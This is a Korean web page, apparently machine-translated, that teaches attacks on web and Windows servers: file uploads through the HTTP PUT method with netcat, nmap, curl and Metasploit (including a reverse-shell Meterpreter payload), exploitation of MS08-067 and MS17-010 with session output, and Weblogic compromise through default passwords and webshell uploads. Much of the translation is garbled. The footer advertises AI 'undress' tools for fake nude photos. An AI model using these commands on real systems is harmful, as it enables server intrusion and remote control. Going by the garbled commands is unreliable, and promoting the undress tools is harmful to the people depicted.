목차
일일 BurpSuite를 사용하여 업로드 대상 경로에 액세스하여 데이터 패킷을 캡처하고, 데이터 패킷 요청 방법 및 업로드 경로를 수정하고, 요청 본문에 파일 내용을 작성한 후 패키지를 다음으로 보냅니다. 웹 서버.
CURL은 URL 구문을 사용하여 명령줄에서 작업하는 파일 전송 도구로, 지정된 URL을 통해 데이터를 업로드하거나 다운로드하고 데이터를 표시합니다. 컬의 c는 클라이언트를 의미하고 URL은 URL을 의미합니다.
2. SMB 취약점 악용
3. Weblogic 취약점 공격
운영 및 유지보수 안전 웹 취약점 악용 현황 분석 사례

웹 취약점 악용 현황 분석 사례

May 27, 2023 am 08:55 AM
web

1. HTTP PUT 방식 활용

PUT는 파일 관리에 사용되는 방식으로, 운영 및 유지 관리 담당자가 웹 서버의 기본 구성을 수정하지 않고 여전히 이러한 방식을 지원하는 경우 서버에 파일을 업로드할 수 있습니다. 파일 시스템을 마음대로.

1.1. Netcat은 PUT 방식을 사용합니다.

Netcat은 "NC"라고 불리는 매우 유명한 네트워크 도구이며 침투 테스트에서는 "Swiss **"로 알려져 있습니다. 포트 모니터링, 포트 스캐닝, 원격 파일 전송, 원격 셸 등 다양한 기능을 구현할 수 있습니다.

웹 서비스를 여는 PUT 방법을 확인하고 알아낸 후 다음 명령을 입력하여 파일을 업로드하십시오.

nc IP PORT

PUT /dav/hack.txt HTTP/1.1

호스트: IP

웹 취약점 악용 현황 분석 사례

Enter를 두 번 누르면 hacked.txt 파일이 성공적으로 생성된 것을 확인할 수 있으며 상태 코드는 201이며 파일 생성 위치는 /dav/ 디렉터리입니다.

1.2, Nmap은 PUT 방법을 사용합니다.

명령:

nmap -p port IP -script http-put-script-args http-put.url='/dav/test.php',http-put.file ='/root/test.php'

명령 설명:

-script http-put //http-put 스크립트를 선택하세요. 이 스크립트는 http put 메소드를 사용한 파일 업로드를 지원합니다. T -Script-rags // 스크립트 매개변수 1, 2를 설정

http-put.url = '/dav/test.php' // 설정 매개변수 1이 업로드 대상 파일 경로

http-put.file = ' /// root/test.php' //매개변수 2를 업로드 로컬 파일 경로로 설정합니다.

웹 취약점 악용 현황 분석 사례 Nmap 스크립트를 통한 업로드가 성공한 것을 사진에서 확인할 수 있습니다.

1.3 BurpSuite는 PUT 방식을 사용합니다

일일 BurpSuite를 사용하여 업로드 대상 경로에 액세스하여 데이터 패킷을 캡처하고, 데이터 패킷 요청 방법 및 업로드 경로를 수정하고, 요청 본문에 파일 내용을 작성한 후 패키지를 다음으로 보냅니다. 웹 서버.

웹 취약점 악용 현황 분석 사례 서버 응답 패키지는 파일이 성공적으로 생성되었음을 보여줍니다.

웹 취약점 악용 현황 분석 사례1.4 CURL은 PUT 방식을 사용합니다

CURL은 URL 구문을 사용하여 명령줄에서 작업하는 파일 전송 도구로, 지정된 URL을 통해 데이터를 업로드하거나 다운로드하고 데이터를 표시합니다. 컬의 c는 클라이언트를 의미하고 URL은 URL을 의미합니다.

PUT 방식으로 파일을 생성하는 명령어는 다음과 같습니다.

명령 1:

curl -i -XPUT -H “Content-Type: text/plain=utf-8” -d “ 해킹 완료” http:/ /192.168.40.4/dav/hack.php

웹 취약점 악용 현황 분석 사례명령 설명:

-i/--include //출력 시 프로토콜 헤더 정보 포함

-X/--request //PUT 명령 지정

                                                                                  | 맨드 2:

curl -i -X ​​​​PUT -H "Content-Type: application/xml; charset =utf-8″ -d @”F:1.php” http://192.168.40.4/dav/hack.php

명령 설명:

-d @“filename” //파일 콘텐츠에서 읽기

웹 취약점 악용 현황 분석 사례

1.5 PUT 메서드를 사용하는 QuickPuT 스크립트

Python 명령줄 도구인 QuickPut을 사용하면 HTTP PUT 메서드를 사용하여 서버에 파일을 업로드할 수 있습니다.

웹 취약점 악용 현황 분석 사례업로드 명령:

python2 QuickPut.py F:1.php http://192.168.40.4/dav/hack1.php

명령 설명:

python QuickPut.py 대상 URL>

1.6 Metasploit은 PUT 방식을 사용합니다웹 취약점 악용 현황 분석 사례

Metasploit의 보조 모듈 보조/스캐너/http/http_put은 파일 업로드 및 삭제 작업을 구현할 수 있습니다.

명령:

http 서비스의 보조 스캔을 위해 http_put 모듈을 사용

show options //모듈 매개변수 표시

set RHOSTS 192.168.40.4 //대상 IP 설정

set PATH /dav/ //대상 설정 경로 웹 취약점 악용 현황 분석 사례

페이로드 설정 php/meterpreter/reverse_tcp //공격 페이로드 설정

파일 이름 설정 msf.php //업로드 파일 이름 설정

웹 취약점 악용 현황 분석 사례

set FILEDATA file://root/test.php //업로드 로컬 파일 데이터 경로 설정

exploit //공격 시작

웹 취약점 악용 현황 분석 사례

반환 결과는 파일이 성공적으로 업로드되었음을 보여줍니다.

2. SMB 취약점 악용

정보 수집 포트 스캔을 수행한 결과 호스트에 포트 139 및 445가 열려 있고 배너에 Microsoft Windows가 표시되는 것을 발견했습니다. 이는 포트 139 및 445 SMB 취약점과 연관됩니다. 더 일반적인 것은 ms17-010, ms08-067 등입니다.

취약점 탐지

명령:

namp --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse –sTIP

namp --script=/usr/share /nmap/scripts/smb-vuln-ms17-010.nse –sTIP

명령 설명:

--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //사용 Nmapms08-067 취약점 스캐닝 스크립트

-sT //TCP 스캐닝 사용

출력 결과가 다음과 같은 경우:

smb-vuln-ms08-067:

VULNERABLE:

Microsoft Windows 시스템은 원격 코드 실행에 취약합니다(MS08-067 )

상태: VULNERABLE

ID: CVE: CVE-2008-4250

Microsoft Windows 2000 SP4, XP SP2 및 SP3, Server 2003 SP1 및 SP2, Vista Gold 및 SP1, Server 2008 및 7 Pre-Beta의 서버 서비스 원격 공격자가 경로 정규화 중에 오버플로를 트리거하는 조작된 RPC 요청을 통해 임의 코드를 실행할 수 있습니다.

공개 날짜: 2008-10-23

참조:

https://technet.microsoft.com/en-us/library/security / ms08-067.aspx

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

은 ms08-067 취약점이 존재함을 나타내며, ms17-010은 같은 상기와.

Exploitation

MSF smb 공격 모듈을 사용하여 ms08-067 및 ms17-010 취약점을 악용하세요.

msf>Exploit/windows/smb/ms08_067_netapi

msfexploit(ms08_067_netapi) 사용 > RHOST IP 설정

msfexploit(ms08_067_netapi) >Exploit

[*]로컬 수신 IP 포트에서 역방향 TCP 핸들러 시작

는 자동으로 탐지 대상 IP: 445

[*] 대상 IP: 445- 지문: Windows 2000 - 서비스 팩 0 - 4 - 언어: English

[*] 대상 IP: 445- 선택 대상: Windows 2000 Universal

[*] 대상 IP: 445- 취약점 트리거 시도 중...

[*]대상 IP로 전송 단계(957487바이트)

[*]Meterpreter 세션 2 열림(IP 포트 모니터링-> 대상 포트 바운스)

meterpreter> ;

ms17-010 익스플로잇은 위와 동일합니다.

3. Weblogic 취약점 공격

Weblogic Server 애플리케이션 서버를 자주 접하게 되는데, Weblogic Server를 보면 백그라운드 관리, JAVA 역직렬화 취약점, 임의 파일 업로드에 취약한 비밀번호가 있을 수 있다는 생각이 듭니다. 이 버전에는 취약점 및 기타 많은 CVE 취약점이 있습니다. Weblogic의 다양한 취약점을 활용하는 방법을 공유해 보겠습니다.

웹 취약점 악용 현황 분석 사례3.1 백엔드 로그인 취약한 비밀번호

일반적인 Weblogic 서버 로그인 취약한 비밀번호

weblogic/weblogic

weblogic/weblogic1

weblogic/weblogic10

weblogic/weblogic123

존재하는 경우 애플리케이션 서버 배경을 관리하고 webshellwar 패키지를 업로드합니다.

웹 취약점 악용 현황 분석 사례

애플리케이션 서버에 war 패키지 업로드 및 배포

웹 취약점 악용 현황 분석 사례

웹 취약점 악용 현황 분석 사례

웹 취약점 악용 현황 분석 사례war 패키지 업로드 및 배포에 성공하면 말레이시아를 방문할 수 있습니다.

3.2 JAVADeserialization Vulnerability

CVE 취약점은 스크립트를 이용하여 직접 탐지할 수 있으며, 취약점 코드를 기반으로 exp 스크립트의 익스플로잇을 찾아낼 수 있습니다.

Weblogic 취약점 탐지 스크립트는 매우 강력하며 다양한 CVE, 관리 배경 경로, SSRF, 취약한 비밀번호를 탐지할 수 있으며 향후 확장을 지원합니다.

웹 취약점 악용 현황 분석 사례

Java 역직렬화 취약점 악용 도구를 사용하여 직접 감지하고 악용할 수도 있습니다. 취약점 도구는 취약점 탐지, 명령 실행, 파일 업로드, 일괄 검사 기능을 제공합니다.

웹 취약점 악용 현황 분석 사례

3.3 Weblogic 임의 파일 업로드 취약점

Weblogic을 폭파하여 정보를 반환합니다.

웹 취약점 악용 현황 분석 사례

로그인 비밀번호, 서비스 이름, 임의의 문자 디렉터리를 확보하고 POC를 구성 및 업로드하여 테스트 파일을 업로드합니다.

/bea_wls_deployment_internal/DeploymentService 경로에 다음 데이터를 입력하세요

웹 취약점 악용 현황 분석 사례

서버는 업로드 성공과 파일의 절대 경로를 반환합니다.

웹 취약점 악용 현황 분석 사례

업로드된 파일의 내용은 업로드된 파일 경로에 접속한 후 표시됩니다

http://IP/bea_wls_deployment_internal/shell.jsp

웹 취약점 악용 현황 분석 사례

위 내용은 웹 취약점 악용 현황 분석 사례의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
WWE 2K25 : Myrise에서 모든 것을 잠금 해제하는 방법
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

Python+Flask를 사용하여 웹 페이지의 실시간 업데이트 및 로그 표시를 구현하는 방법 Python+Flask를 사용하여 웹 페이지의 실시간 업데이트 및 로그 표시를 구현하는 방법 May 17, 2023 am 11:07 AM

1. 모듈을 사용하여 파일에 로그 출력: 로깅은 사용자 정의 수준 로그를 생성하고 지정된 경로에 로그를 출력할 수 있습니다. 로그 수준: 디버그(디버그 로그) = 5) {clearTimeout(시간) // 한 번에 모두 10번 획득한 경우 행이 비어 있음 로그 지우기 예약 작업}return}if(data.log_type==2){//(i=0;i에 대해 새 로그를 얻은 경우)

Nginx 웹 서버 캐디를 사용하는 방법 Nginx 웹 서버 캐디를 사용하는 방법 May 30, 2023 pm 12:19 PM

Caddy 소개 Caddy는 현재 Github에 38,000개 이상의 별이 있는 강력하고 확장성이 뛰어난 웹 서버입니다. Caddy는 Go 언어로 작성되었으며 정적 리소스 호스팅 및 역방향 프록시에 사용할 수 있습니다. Caddy에는 다음과 같은 주요 기능이 있습니다. Nginx의 복잡한 구성에 비해 원래 Caddyfile 구성은 매우 간단합니다. 기본적으로 자동화된 HTTPS 구성을 지원하고 HTTPS 인증서를 자동으로 적용할 수 있습니다. 수만 개의 사이트를 Go 언어로 작성하여 어디서나 실행할 수 있으며 메모리 안전성이 더욱 보장됩니다. 우선 CentO에 직접 설치해보겠습니다.

Java API 개발에서 웹 서버 처리를 위해 Jetty7 사용 Java API 개발에서 웹 서버 처리를 위해 Jetty7 사용 Jun 18, 2023 am 10:42 AM

JavaAPI 개발에서 웹 서버 처리를 위해 Jetty7 사용 인터넷의 발전과 함께 웹 서버는 애플리케이션 개발의 핵심 부분이 되었으며 많은 기업의 초점이기도 합니다. 증가하는 비즈니스 요구를 충족하기 위해 많은 개발자가 웹 서버 개발에 Jetty를 사용하기로 선택했으며 그 유연성과 확장성은 널리 인정받고 있습니다. 이 기사에서는 We 용 JavaAPI 개발에서 Jetty7을 사용하는 방법을 소개합니다.

웹상의 얼굴 차단 공격에 대한 실시간 보호(머신러닝 기반) 웹상의 얼굴 차단 공격에 대한 실시간 보호(머신러닝 기반) Jun 10, 2023 pm 01:03 PM

얼굴 차단 사격은 영상 속 인물을 가리지 않고 다수의 사격이 떠다니는 것처럼 보이도록 하여 마치 인물 뒤에서 떠다니는 것처럼 보이게 하는 것을 의미합니다. 기계 학습은 몇 년 동안 널리 사용되었지만 많은 사람들은 이러한 기능을 브라우저에서도 실행할 수 있다는 사실을 모릅니다. 이 기사에서는 기사 마지막 부분에 적용 가능한 몇 가지 시나리오를 소개합니다. 이 솔루션을 통해 몇 가지 아이디어를 얻을 수 있기를 바랍니다. mediapipeDemo(https://google.github.io/mediapipe/)는 주류 얼굴 차단 공세 주문형 업로드의 구현 원리를 보여줍니다. 비디오 서버 백그라운드 계산은 비디오 화면의 세로 영역을 추출하고 이를 svg로 변환합니다. 클라이언트가 비디오를 재생하는 동안 서버에서 svg를 다운로드하고 사격, 초상화와 결합합니다.

frps 서버와 웹이 포트 80을 공유하도록 nginx를 구성하는 방법 frps 서버와 웹이 포트 80을 공유하도록 nginx를 구성하는 방법 Jun 03, 2023 am 08:19 AM

우선, frp가 무엇인지에 대해 의문이 생길 것입니다. 간단히 말해서, frp는 인트라넷 침투 도구입니다. 클라이언트를 구성한 후 서버를 통해 인트라넷에 액세스할 수 있습니다. 이제 내 서버는 nginx를 웹 사이트로 사용했으며 포트 80은 하나만 있습니다. FRP 서버도 포트 80을 사용하려면 어떻게 해야 합니까? 쿼리 후에는 nginx의 역방향 프록시를 사용하여 이를 수행할 수 있습니다. 추가하려면: frps는 서버이고 frpc는 클라이언트입니다. 1단계: 서버에서 nginx.conf 구성 파일을 수정하고 nginx.conf의 http{}에 다음 매개변수를 추가합니다. server{listen80

Golang을 사용하여 웹 애플리케이션에 대한 양식 유효성 검사를 구현하는 방법 Golang을 사용하여 웹 애플리케이션에 대한 양식 유효성 검사를 구현하는 방법 Jun 24, 2023 am 09:08 AM

양식 유효성 검사는 웹 애플리케이션 개발에서 매우 중요한 링크로, 애플리케이션의 보안 취약성과 데이터 오류를 방지하기 위해 양식 데이터를 제출하기 전에 데이터의 유효성을 확인할 수 있습니다. Golang을 사용하여 웹 애플리케이션에 대한 양식 유효성 검사를 쉽게 구현할 수 있습니다. 이 기사에서는 Golang을 사용하여 웹 애플리케이션에 대한 양식 유효성 검사를 구현하는 방법을 소개합니다. 1. 폼 유효성 검사의 기본 요소 폼 유효성 검사를 구현하는 방법을 소개하기 전에 먼저 폼 유효성 검사의 기본 요소가 무엇인지 알아야 합니다. 양식 요소: 양식 요소는

웹 표준이란 무엇입니까? 웹 표준이란 무엇입니까? Oct 18, 2023 pm 05:24 PM

웹 표준은 W3C 및 기타 관련 기관에서 개발한 일련의 사양 및 지침으로, HTML, CSS, JavaScript, DOM, 웹 접근성 및 성능 최적화를 포함하며, 이러한 표준을 따르면 페이지의 호환성이 향상됩니다. 접근성, 유지 관리성 및 성능. 웹 표준의 목표는 웹 콘텐츠가 다양한 플랫폼, 브라우저 및 장치에서 일관되게 표시되고 상호 작용할 수 있도록 하여 더 나은 사용자 경험과 개발 효율성을 제공하는 것입니다.

조종석 웹 UI에서 관리 액세스를 활성화하는 방법 조종석 웹 UI에서 관리 액세스를 활성화하는 방법 Mar 20, 2024 pm 06:56 PM

Cockpit은 Linux 서버용 웹 기반 그래픽 인터페이스입니다. 이는 주로 신규/전문가 사용자가 Linux 서버를 보다 쉽게 ​​관리할 수 있도록 하기 위한 것입니다. 이 문서에서는 Cockpit 액세스 모드와 CockpitWebUI에서 Cockpit으로 관리 액세스를 전환하는 방법에 대해 설명합니다. 콘텐츠 항목: Cockpit 입장 모드 현재 Cockpit 액세스 모드 찾기 CockpitWebUI에서 Cockpit에 대한 관리 액세스 활성화 CockpitWebUI에서 Cockpit에 대한 관리 액세스 비활성화 결론 조종석 입장 모드 조종석에는 두 가지 액세스 모드가 있습니다. 제한된 액세스: 이는 조종석 액세스 모드의 기본값입니다. 이 액세스 모드에서는 조종석에서 웹 사용자에 액세스할 수 없습니다.

See all articles